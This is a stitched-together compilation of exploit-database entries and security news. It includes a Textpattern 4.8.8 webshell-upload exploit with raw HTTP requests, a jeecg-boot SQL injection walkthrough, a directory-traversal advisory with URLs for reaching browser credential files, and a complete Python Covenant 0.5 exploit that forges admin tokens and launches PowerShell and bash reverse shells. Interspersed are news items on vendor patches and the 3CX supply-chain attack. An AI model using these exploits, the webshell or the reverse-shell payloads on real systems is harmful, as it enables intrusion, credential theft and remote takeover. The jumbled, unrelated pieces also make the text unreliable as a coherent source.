Textpattern version 4.8.8 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)# Exploit Author: Alperen Ergel# Contact: @alpernae (IG/TW)# Software Homepage: https://textpattern.com/# Version : 4.8.8# Tested on: windows 11 xammp | Kali linux# Category: WebApp# Google Dork: intext:"Published with Textpattern CMS"# Date: 10/09/2022######### Description ##########  Step 1: Login admin account and go settings of site#  Step 2: Upload a file to web site and selecet the rce.php#  Step3 : Upload your webshell that's it...######### Proof of Concept ########========>>> START REQUEST <<<=========############# POST REQUEST (FILE UPLOAD) ############################## (1)POST /textpattern/index.php?event=file HTTP/1.1Host: localhostContent-Length: 1038sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMgUEFltFdqBVvdJuX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/textpattern/index.php?event=fileAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: txp_login=admin%2C94d754006b895d61d9ce16cf55165bbf; txp_login_public=4353608be0adminConnection: close------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="fileInputOrder"1/1------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="app_mode"async------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="MAX_FILE_SIZE"2000000------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="event"file------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="step"file_insert------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="id"------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="_txp_token"16ea3b64ca6379aee9599586dae73a5d------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="thefile[]"; filename="rce.php"Content-Type: application/octet-stream<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>------WebKitFormBoundaryMgUEFltFdqBVvdJu--############ POST RESPONSE (FILE UPLOAD) ######### (1)HTTP/1.1 200 OKDate: Sat, 10 Sep 2022 15:28:57 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6X-Powered-By: PHP/8.1.6X-Textpattern-Runtime: 35.38 msX-Textpattern-Querytime: 9.55 msX-Textpattern-Queries: 16X-Textpattern-Memory: 2893 kBContent-Length: 270Connection: closeContent-Type: text/javascript; charset=utf-8___________________________________________________________________________________________________________________________________________________############ REQUEST TO THE PAYLOAD ############################### (2)GET /files/c.php?cmd=whoami HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: txp_login_public=4353608be0adminConnection: close############ RESPONSE THE PAYLOAD ############################### (2)HTTP/1.1 200 OKDate: Sat, 10 Sep 2022 15:33:06 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6X-Powered-By: PHP/8.1.6Content-Length: 29Connection: closeContent-Type: text/html; charset=UTF-8<pre>alpernae\alperen</pre>========>>> END REQUEST <<<=========

Textpattern 4.8.8 Remote Code Execution

Plus: Microsoft Outlook and Android patch serious flaws, Chrome and Firefox get fixes, and much more.

Meanwhile, researchers at Google’s Project Zero have reported 18 zero-day vulnerabilities in Exynos Modems made by Samsung. The four most severe—CVE-2023-24033, CVE-2023-26496, CVE-2023-26497, and CVE-2023-26498—allow internet-to-baseband remote code execution, the researchers wrote in a blog. “Tests conducted by Project Zero confirm that the four vulnerabilities allow an attacker to remotely compromise a phone at the baseband level with no user interaction, and require only that the attacker know the victim’s phone number,” they wrote. 

Affected devices include those in the S22, M33, M13, M12, A71, A53, A33, A21s, A13, A12, and A04 series, as well as Google’s Pixel 6 and Pixel 7 series.

Patch timelines will vary per manufacturer, but affected Pixel devices have received a fix for all four of the severe internet-to-baseband remote code execution vulnerabilities. In the meantime, users with affected devices can protect themselves by turning off Wi-Fi calling and Voice-over-LTE (VoLTE) in their device settings, Google said.

Google Chrome 

Google has released Chrome 111 of its popular browser, fixing eight security flaws, seven of which are memory safety bugs with a high severity rating. Four use-after-free vulnerabilities include a high-severity issue tracked as CVE-2023-1528 in Passwords and CVE-2023-1529, an out-of-bounds memory access flaw in WebHID.

Meanwhile, CVE-2023-1530 is a use-after-free bug in PDF reported by the UK’s National Cyber Security Centre, and CVE-2023-1531 is a high-severity use-after-free vulnerability in ANGLE.

None of the issues are known by Google to have been used in attacks, but given their impact, it makes sense to update Chrome when you can.

Cisco

Enterprise software giant Cisco has published the twice-yearly security bundle for its IOS and IOS XE Software, fixing 10 vulnerabilities. Six of the issues fixed by Cisco are rated as having a high impact, including CVE-2023-20080, a denial of service flaw, and CVE-2023-20065, a privilege escalation bug.

At the start of the month, Cisco fixed multiple vulnerabilities in the web-based management interface of some Cisco IP Phones that could allow an unauthenticated, remote attacker to execute arbitrary code or cause denial of service. With a CVSS score of 9.8, the worst is CVE-2023-20078, a vulnerability in the web-based management interface of Cisco IP Phone 6800, 7800, and 8800 series multiplatform phones. 

An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface, Cisco said, adding, “A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system of an affected device.”

Firefox

Privacy-conscious developer Mozilla has released Firefox 111, fixing 13 vulnerabilities, seven of which are rated as having a high impact. These include three flaws in Firefox for Android, including CVE-2023-25749, which may have resulted in third-party apps opening without a prompt.

Meanwhile, two memory safety bugs, CVE-2023-28176 and CVE-2023-28177, have been fixed in Firefox 111. “Some of these bugs showed evidence of memory corruption, and we presume that with enough effort some of these could have been exploited to run arbitrary code,” Mozilla said.

SAP

It’s another month of big updates for software maker SAP, which has released 19 new security notes in its March Security Patch Day guidance. Issues fixed during the month include four with a CVSS score of over 9. 

One of the worst of these is CVE-2023-25616, a code injection vulnerability in SAP Business Objects Business Intelligence Platform. This vulnerability in the Central Management Console allows an attacker to inject arbitrary code with a “strong negative impact” on the integrity, confidentiality, and availability of the system, security firm Onapsis said.

Finally, with a CVSS score of 9.9, CVE-2023-23857 is an improper access control bug in SAP NetWeaver AS for Java. “The vulnerability allows an unauthenticated attacker to attach to an open interface and make use of an open naming and directory API to access services,” Onapsis said.

Apple's iOS 16.4: Security Updates Are Better Than a Goose Emoji

A vulnerability was found in jeecg-boot 3.5.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file SysDictMapper.java of the component Sleep Command Handler. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224629 was assigned to this vulnerability.

**SQL injection exists in the background interface of Jeecg-boot 3.5.0****Environmental Deployment**

Download source code

https://github.com/jeecgboot/jeecg-boot/releases/tag/v3.5.0

Deploy source code through idea

Configure pom and reload dependencies

Green Leaf Launch Project Appears  

**Vulnerability mining**

global search ${

jeecg-boot-3.5.0/jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/mapper/xml/SysDictMapper.xml

There are variable splicing statements in line 106

Click on the duplicate CheckCountSqlNoDataId tag to jump to SysDictMapper.java for the statement with variable splicing in line 106

jeecg-boot-3.5.0/jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/mapper/SysDictMapper.java

After clicking the duplicateCheckCountSqlNoDataId method, jump to the DuplicateCheckController controller

jeecg-boot-3.5.0/jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/DuplicateCheckController.java

The general meaning of the code logic is that the get method accepts parameters and uses the SqlInjectionUtil method on line 55 to filter keywords, but does not filter sleep

The front-end access interface was tested and found to require X-Access-Token, otherwise it cannot be accessed

**Obtain the verification code image**

http://192.168.1.103:8080/jeecg-boot/sys/randomImage/9169ea44fee2e773df644053d67c94a1

**Copy body data to browser**

**Access background login address**

http://192.168.1.103:8080/jeecg-boot/sys/login

The get method is not supported, burpsuite packet capturing is changed to post

**Get token**

Get token and add Content Type: application/json Add post data

    {
    	"username":"admin",
    	"password":"123456",
    	"remember_me":"true",
    	"captcha":"mYUw",
    	"checkKey":"9169ea44fee2e773df644053d67c94a1"
    }
    

**Access Vulnerability Interface**

http://192.168.1.103:8080/jeecg-boot/#/default/%E9%87%8D%E5%A4%8D%E6%A0%A1%E9%AA%8C/doDuplicateCheckUsingGET

Set X-Access Token

Sending data and capturing packets

Normal data without delay

Enter and% 09sleep (5) for a delay time of five seconds

This is a packet

    GET /jeecg-boot/sys/duplicate/check?dataId=2000&fieldName=1+and%09sleep(5)&fieldVal=1000&tableName=sys_log HTTP/1.1
    Host: 192.168.1.103:8080
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    knife4j-gateway-code: ROOT
    X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2Nzk2NDM4OTUsInVzZXJuYW1lIjoiYWRtaW4ifQ.xJCpEt2pg3Zs5MdMYwcggZ85uLZcziQm_Ed1RQyC0kU
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.51
    Request-Origion: Knife4j
    Referer: http://192.168.1.103:8080/jeecg-boot/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
    Connection: close
    

**Repair plan**

These keywords such as and sleep if are also filtered.

CVE-2023-1741: report/README.md at main · private-null/report

Virtual Reception version 1.0 suffers from a directory traversal vulnerability.

    # Exploit Title: Virtual Reception v1.0 - Web Server Directory Traversal# Exploit Author: Spinae# Vendor Homepage: https://www.virtualreception.nl/# Version: win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY# Tested on: allWe discovered the web server of the Virtual Reception appliance is prone toan unauthenticated directory traversal vulnerability. This allows anattacker to traverse outside the server root directory by specifying filesat the end of a URL request.This is a NUC5i5RYhttp://[ip address]/c:/WINDOWS/System32/drivers/etc/hostshttp://[ip address]/C:/windows/WindowsUpdate.log...A user called 'receptie' exists on the Windows system:http://[ip address]/c:/users/receptie/ntuser.dathttp://[ip address]/c:/users/receptie/ntuser.inihttp://[ip address]/c:/users/receptie/appdata/local/temp/wmsetup.log...http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/UserData/Default/Login Datahttp://[ipaddress]/c:/users/receptie/AppData/Local/Google/Chrome/User%20Data/Local%20Statehttp://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/UserData/Default/Cookies...The appliance also keeps a log of the visitors that register at theentrance:http://[ip address]/visitors.csvhash icon for shodan searches:https://www.shodan.io/search?query=http.favicon.hash%3A656388049No reply from the vendor (phone, email, website form submissions), firstreported in 2021.-- DISCLAIMER: Unless indicated otherwise, the information contained in this message is privileged and confidential, and is intended only for the use of the addressee(s) named above and others who have been specifically authorized to receive it. If you are not the intended recipient, you are hereby notified that any dissemination, distribution or copying of this message and/or attachments is strictly prohibited. The company accepts no liability for any damage caused by any virus transmitted by this message. Furthermore, the company does not warrant a proper and complete transmission of this information, nor does it accept liability for any delays. If you have received this message in error, please contact the sender and delete the message. Thank you.

Virtual Reception 1.0 Directory Traversal

Covenant version 0.5 suffers from a remote code execution vulnerability.

    # Exploit Title: Covenant v0.5 - Remote Code Execution (RCE)# Exploit Author: xThaz# Author website: https://xthaz.fr/# Date: 2022-09-11# Vendor Homepage: https://cobbr.io/Covenant.html# Software Link: https://github.com/cobbr/Covenant# Version: v0.1.3 - v0.5# Tested on: Windows 11 compiled covenant (Windows defender disabled), Linux covenant docker# Vulnerability## Discoverer: coastal## Date: 2020-07-13## Discoverer website: https://blog.null.farm## References:##   - https://blog.null.farm/hunting-the-hunters##   - https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb# !/usr/bin/env python3# encoding: utf-8import jwt  # pip3 install PyJWTimport jsonimport warningsimport base64import reimport randomimport argparsefrom requests.packages.urllib3.exceptions import InsecureRequestWarningfrom Crypto.Hash import HMAC, SHA256  # pip3 install pycryptodomefrom Crypto.Util.Padding import padfrom Crypto.Cipher import AESfrom requests import request  # pip3 install requestsfrom subprocess import runfrom pwn import remote, context  # pip3 install pwntoolsfrom os import remove, urandomfrom shutil import whichfrom urllib.parse import urlparsefrom pathlib import Pathfrom time import timedef check_requirements():    if which("mcs") is None:        print("Please install the mono framework in order to compile the payload.")        print("https://www.mono-project.com/download/stable/")        exit(-1)def random_hex(length):    alphabet = "0123456789abcdef"    return ''.join(random.choice(alphabet) for _ in range(length))def request_api(method, token, route, body=""):    warnings.simplefilter('ignore', InsecureRequestWarning)    return request(        method,        f"{args.target}/api/{route}",        json=body,        headers={            "Authorization": f"Bearer {token}",            "Content-Type": "application/json"        },        verify=False    )def craft_jwt(username, userid=f"{random_hex(8)}-{random_hex(4)}-{random_hex(4)}-{random_hex(4)}-{random_hex(12)}"):    secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC'    payload_data = {        "sub": username,        "jti": "925f74ca-fc8c-27c6-24be-566b11ab6585",        "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid,        "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [            "User",            "Administrator"        ],        "exp": int(time()) + 360,        "iss": "Covenant",        "aud": "Covenant"    }    token = jwt.encode(payload_data, secret_key, algorithm='HS256')    return tokendef get_id_admin(token, json_roles):    id_admin = ""    for role in json_roles:        if role["name"] == "Administrator":            id_admin = role["id"]            print(f"\t[*] Found the admin group id : {id_admin}")            break    else:        print("\t[!] Did not found admin group id, quitting !")        exit(-1)    id_admin_user = ""    json_users_roles = request_api("get", token, f"users/roles").json()    for user_role in json_users_roles:        if user_role["roleId"] == id_admin:            id_admin_user = user_role["userId"]            print(f"\t[*] Found the admin user id : {id_admin_user}")            break    else:            print("\t[!] Did not found admin id, quitting !")        exit(-1)    json_users = request_api("get", token, f"users").json()    for user in json_users:        if user["id"] == id_admin_user:            username_admin = user["userName"]            print(f"\t[*] Found the admin username : {username_admin}")            return username_admin, id_admin_user    else:            print("\t[!] Did not found admin username, quitting !")        exit(-1)def compile_payload():    if args.os == "windows":        payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""'    else:        payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""'    dll = """using System;using System.Reflection;namespace ExampleDLL{    public class Class1{        public Class1(){        }        public void Main(string[] args){            System.Diagnostics.Process.Start(""" + payload + """);        }    }}"""    temp_dll_path = f"/tmp/{random_hex(8)}"    Path(f"{temp_dll_path}.cs").write_bytes(dll.encode())    print(f"\t[*] Writing payload in {temp_dll_path}.cs")    compilo_path = which("mcs")    compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"])    if compilation.returncode:        print("\t[!] Error when compiling DLL, quitting !")        exit(-1)    print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll")    dll_encoded = base64.b64encode(Path(f"{temp_dll_path}.dll").read_bytes()).decode()    remove(temp_dll_path + ".cs")    remove(temp_dll_path + ".dll")    print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll")    return dll_encodeddef generate_wrapper(dll_encoded):    wrapper = """public static class MessageTransform {    public static string Transform(byte[] bytes) {        try {            string assemblyBase64 = \"""" + dll_encoded + """\";            var assemblyBytes = System.Convert.FromBase64String(assemblyBase64);            var assembly = System.Reflection.Assembly.Load(assemblyBytes);            foreach (var type in assembly.GetTypes()) {                object instance = System.Activator.CreateInstance(type);                object[] args = new object[] { new string[] { \"\" } };                try {                    type.GetMethod(\"Main\").Invoke(instance, args);                }                catch {}            }        }        catch {}        return System.Convert.ToBase64String(bytes);    }    public static byte[] Invert(string str) {        return System.Convert.FromBase64String(str);    }}"""    return wrapperdef upload_profile(token, wrapper):    body = {        'httpUrls': [            '/en-us/index.html',            '/en-us/docs.html',            '/en-us/test.html'        ],        'httpRequestHeaders': [            {'name': 'User-Agent',             'value': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 '                      'Safari/537.36'},            {'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'}        ],        'httpResponseHeaders': [            {'name': 'Server', 'value': 'Microsoft-IIS/7.5'}        ],        'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73',        'httpGetResponse': '{DATA}',        'httpPostResponse': '{DATA}',        'id': 0,        'name': random_hex(8),        'description': '',        'type': 'HTTP',        'messageTransform': wrapper    }    response = request_api("post", token, "profiles/http", body)    if not response.ok:        print("\t[!] Failed to create the listener profile, quitting !")        exit(-1)    else:        profile_id = response.json().get('id')        print(f"\t[*] Profile created with id {profile_id}")        print("\t[*] Successfully created the listener profile")        return profile_iddef generate_valid_listener_port(impersonate_token, tries=0):    if tries >= 10:        print("\t[!] Tried 10 times to generate a listener port but failed, quitting !")        exit(-1)    port = random.randint(8000, 8250)  # TO BE EDITED WITH YOUR TARGET LISTENER PORT    listeners = request_api("get", impersonate_token, "listeners").json()    port_used = []    for listener in listeners:        port_used.append(listener["bindPort"])    if port in port_used:        print(f"\t[!] Port {port} is already taken by another listener, retrying !")        generate_valid_listener_port(impersonate_token, tries + 1)    else:        print(f"\t[*] Port {port} seems free")        return portdef get_id_listener_type(impersonate_token, listener_name):    response = request_api("get", impersonate_token, "listeners/types")    if not response.ok:        print("\t[!] Failed to get the listener type, quitting !")        exit(-1)    else:        for listener_type in response.json():            if listener_type["name"] == listener_name:                print(f'\t[*] Found id {listener_type["id"]} for listener {listener_name}')                return listener_type["id"]def generate_listener(impersonate_token, profile_id):    listener_port = generate_valid_listener_port(impersonate_token)    listener_name = random_hex(8)    data = {        'useSSL': False,        'urls': [            f"http://0.0.0.0:{listener_port}"        ],        'id': 0,        'name': listener_name,        'bindAddress': "0.0.0.0",        'bindPort': listener_port,        'connectAddresses': [            "0.0.0.0"        ],        'connectPort': listener_port,        'profileId': profile_id,        'listenerTypeId': get_id_listener_type(impersonate_token, "HTTP"),        'status': 'Active'    }    response = request_api("post", impersonate_token, "listeners/http", data)    if not response.ok:        print("\t[!] Failed to create the listener, quitting !")        exit(-1)    else:        print("\t[*] Successfully created the listener")        listener_id = response.json().get("id")        return listener_id, listener_portdef create_grunt(impersonate_token, data):    stager_code = request_api("put", impersonate_token, "launchers/binary", data).json()["stagerCode"]    if stager_code == "":        stager_code = request_api("post", impersonate_token, "launchers/binary", data).json()["stagerCode"]        if stager_code == "":            print("\t[!] Failed to create the grunt payload, quitting !")            exit(-1)    print("\t[*] Successfully created the grunt payload")    return stager_codedef get_grunt_config(impersonate_token, listener_id):    data = {        'id': 0,        'listenerId': listener_id,        'implantTemplateId': 1,        'name': 'Binary',        'description': 'Uses a generated .NET Framework binary to launch a Grunt.',        'type': 'binary',        'dotNetVersion': 'Net35',        'runtimeIdentifier': 'win_x64',        'validateCert': True,        'useCertPinning': True,        'smbPipeName': 'string',        'delay': 0,        'jitterPercent': 0,        'connectAttempts': 0,        'launcherString': 'GruntHTTP.exe',        'outputKind': 'consoleApplication',        'compressStager': False    }    stager_code = create_grunt(impersonate_token, data)    aes_key = re.search(r'FromBase64String$@\"(.[A-Za-z0-9+\/=]{40,50}?)\"$;', stager_code)    guid_prefix = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code)    if not aes_key or not guid_prefix:        print("\t[!] Failed to retrieve the grunt configuration, quitting !")        exit(-1)    aes_key = aes_key.group(1)    guid_prefix = guid_prefix.group(1)    print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}")    return aes_key, guid_prefixdef aes256_cbc_encrypt(key, message):    iv_bytes = urandom(16)    key_decoded = base64.b64decode(key)    encoded_message = pad(message.encode(), 16)    cipher = AES.new(key_decoded, AES.MODE_CBC, iv_bytes)    encrypted = cipher.encrypt(encoded_message)    hmac = HMAC.new(key_decoded, digestmod=SHA256)    signature = hmac.update(encrypted).digest()    return encrypted, iv_bytes, signaturedef trigger_exploit(listener_port, aes_key, guid):    message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"    ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message)    data = {        "GUID": guid,        "Type": 0,        "Meta": '',        "IV": base64.b64encode(iv).decode(),        "EncryptedMessage": base64.b64encode(ciphered).decode(),        "HMAC": base64.b64encode(signature).decode()    }    json_data = json.dumps(data).encode("utf-8")    payload = f"i=a19ea23062db990386a3a478cb89d52e&data={base64.urlsafe_b64encode(json_data).decode()}&session=75db-99b1-25fe4e9afbe58696-320bea73"    if send_exploit(listener_port, "Cookie", guid, payload):        print("\t[*] Exploit succeeded, check listener")    else :        print("\t[!] Exploit failed, retrying")        if send_exploit(listener_port, "Cookies", guid, payload):            print("\t[*] Exploit succeeded, check listener")        else:            print("\t[!] Exploit failed, quitting")def send_exploit(listener_port, header_cookie, guid, payload):    context.log_level = 'error'    request = f"""POST /en-us/test.html HTTP/1.1\rHost: {IP_TARGET}:{listener_port}\rUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r{header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750\rContent-Type: application/x-www-form-urlencoded\rContent-Length: {len(payload)}\r\r{payload}""".encode()    sock = remote(IP_TARGET, listener_port)    sock.sendline(request)    response = sock.recv().decode()    sock.close()    if "HTTP/1.1 200 OK" in response:        return True    else:        return Falseif __name__ == "__main__":    check_requirements()    parser = argparse.ArgumentParser()    parser.add_argument("target",                        help="URL where the Covenant is hosted, example : https://127.0.0.1:7443")    parser.add_argument("os",                        help="Operating System of the target",                        choices=["windows", "linux"])    parser.add_argument("lhost",                        help="IP of the machine that will receive the reverse shell")    parser.add_argument("lport",                        help="Port of the machine that will receive the reverse shell")    args = parser.parse_args()    IP_TARGET = urlparse(args.target).hostname    print("[*] Getting the admin info")    sacrificial_token = craft_jwt("xThaz")    roles = request_api("get", sacrificial_token, "roles").json()    admin_username, admin_id = get_id_admin(sacrificial_token, roles)    impersonate_token = craft_jwt(admin_username, admin_id)    print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}")    print("[*] Generating payload")    dll_encoded = compile_payload()    wrapper = generate_wrapper(dll_encoded)    print("[*] Uploading malicious listener profile")    profile_id = upload_profile(impersonate_token, wrapper)    print("[*] Generating listener")    listener_id, listener_port = generate_listener(impersonate_token, profile_id)    print("[*] Triggering the exploit")    aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id)    trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}")

Covenant 0.5 Remote Code Execution

By Deeba Ahmed
According to cybersecurity researchers, a nation-state actor, LABYRINTH CHOLLIMA, is suspected to be behind the multi-stage attack on 3CXDesktopApp.
This is a post from HackRead.com Read the original post: Popular PABX platform, 3CX Desktop App suffers supply chain attack

SentinelOne has dubbed the attack “Smooth Operator,” while CrowdStrike suspects the involvement of a North Korean government-state actor known as LABYRINTH CHOLLIMA.

CrowdStrike and SentinelOne cybersecurity researchers identified an unusual spike in malicious activity from a single, legitimate binary, 3CX Voice Over Internet Protocol (VOIP) desktop App (3CX Desktop App).

**Campaign Details**

On March 29, 2023, CrowdStrike researchers observed malicious activity, including beaconing to attacker-operated infrastructure, deploying second-stage payloads, and, in some cases, hands-on keyboard activity.

Since the app is available for Windows, macOS, and Linux, the activity was observed on Mac and Windows systems. Mobile versions are also available for Android and iOS devices. For browsers, the app is available as an extension for Chrome, and a browser-based version is available for the Progressive Web app.

Researchers suspect the involvement of a North Korean government-state actor, LABYRINTH CHOLLIMA. CrowdStrike Intelligence sent an alert to its customers yesterday morning. On the other hand, SentinelOne started seeing an uptick in 3CX Desktop App behaviour on March 22, 2023.

It is worth mentioning that SentinelOne has dubbed the attack “Smooth Operator.” The company urges customers to ensure that prevention policies are appropriately configured and that Suspicious Processes are activated to stay protected.

**Multi-Stage Attack Scenario**

In this multi-stage attack, the malicious 3CX Desktop App installer serves as a shellcode loader that executes the shellcode from heap space and loads a DLL after removing the “MZ” at the start.

This DLL is later called through the DllGetClassObject export. At this stage, icon files are downloaded from a specific GitHub repository: (github.com/IconStorages/images).

These ICO files append Base64 data at the end, which is then decoded and used to download the final stage. In this stage, info-stealer functionality is implemented, which includes collecting system and browser data. It can collect data from Chrome, Brave, Edge, and Firefox browsers, and the collected data includes browsing history from Chrome and Places tab data from Firefox.

**What is 3CXDesktopApp**

For your information, 3CX Desktop App is a widely-used voice and video conferencing and call routing software characterized as a Private Automatic Branch Exchange (PABX) platform.

The platform is used by 600,000 companies globally and has more than 12 million active users. Companies in the automobile, manufacturing, hospitality, food & beverage, and MSP (managed information technology provider) sectors commonly use it.

It is worth noting that PBX software is an attractive target for launching supply-chain attacks, as these allow attackers to monitor organizations’ communications and alter call routing and broker connections into external voice services.

**UPDATE:**

In a subsequent update, 3CX stated that the problem seemed to stem from a bundled library that was compiled into the Windows Electron app via git, and the company is currently conducting further investigations into the matter.

1.  PyPI Packages Drop Malware in New Supply Chain Attack
2.  News Corp’s software supply chain attack & cybersecurity
3.  SolarWinds supply chain attack affected 250 organizations
4.  Access:7 Supply Chain Flaws Impact ATMs and IoT devices

Popular PABX platform, 3CX Desktop App suffers supply chain attack

3CX said it's working on a software update for its desktop app after multiple cybersecurity vendors sounded the alarm on what appears to be an active supply chain attack that's using digitally signed and rigged installers of the popular voice and video conferencing software to target downstream customers.
"The trojanized 3CX desktop app is the first stage in a multi-stage attack chain that pulls

Supply Chain / Software Security

3CX said it's working on a software update for its desktop app after multiple cybersecurity vendors sounded the alarm on what appears to be an active supply chain attack that's using digitally signed and rigged installers of the popular voice and video conferencing software to target downstream customers.

"The trojanized 3CX desktop app is the first stage in a multi-stage attack chain that pulls ICO files appended with Base64 data from GitHub and ultimately leads to a third-stage infostealer DLL," SentinelOne researchers said.

The cybersecurity firm is tracking the activity under the name **SmoothOperator**, stating the threat actor registered a massive attack infrastructure as far back as February 2022.

3CX, the company behind 3CXDesktopApp, claims to have more than 600,000 customers and 12 million users in 190 countries, some of which include well-known names like American Express, BMW, Honda, Ikea, Pepsi, and Toyota, among others.

While the 3CX PBX client is available for multiple platforms, Sophos, citing telemetry data, pointed out that the attacks observed so far are confined to the Windows Electron client of the PBX phone system.

The infection chain, in a nutshell, takes advantage of the DLL side-loading technique to load a rogue DLL (ffmpeg.dll) that's designed to retrieve an icon file (ICO) payload. The GitHub repository hosting the file has since been taken down.

The information stealer is capable of gathering system information and sensitive data stored in Google Chrome, Microsoft Edge, Brave, and Mozilla Firefox browsers.

Cybersecurity firm CrowdStrike said it suspects the attack to be linked to a North Korean nation-state actor it tracks as Labyrinth Chollima (aka Nickel Academy), a sub-cluster within the notorious Lazarus Group.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

"The malicious activity includes beaconing to actor-controlled infrastructure, deployment of second-stage payloads, and, in a small number of cases, hands-on-keyboard activity," CrowdStrike added.

